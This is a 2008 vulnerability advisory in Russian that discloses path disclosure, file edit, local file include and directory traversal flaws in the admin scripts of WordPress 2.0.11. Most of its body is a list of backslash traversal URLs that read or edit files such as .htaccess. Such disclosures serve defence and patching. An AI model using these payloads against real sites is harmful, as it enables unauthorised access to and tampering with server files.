Arbitrary file edit, Local file include, Directory traversal and Full path disclosure in WordPress

2008-01-02T00:00:00
ID SECURITYVULNS:DOC:18773
Type securityvulns
Reporter Securityvulns
Modified 2008-01-02T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Arbitrary file edit, Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файле templates.php (в параметрах file и page) и файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php и page-new.php (в параметре page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (работает только в WP 2.0.11)

http://site/wp-admin/templates.php?page=

http://site/wp-admin/edit-pages.php?page=

http://site/wp-admin/categories.php?page=

http://site/wp-admin/edit-comments.php?page=

http://site/wp-admin/moderation.php?page=

http://site/wp-admin/post.php?page=

http://site/wp-admin/page-new.php?page=

Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include и Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php

http://sites/wp-admin/templates.php?page=\..\..\.htaccess

http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess

http://site/wp-admin/categories.php?page=\..\..\.htaccess

http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess

http://site/wp-admin/moderation.php?page=\..\..\.htaccess

http://site/wp-admin/post.php?page=\..\..\.htaccess

http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1686/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua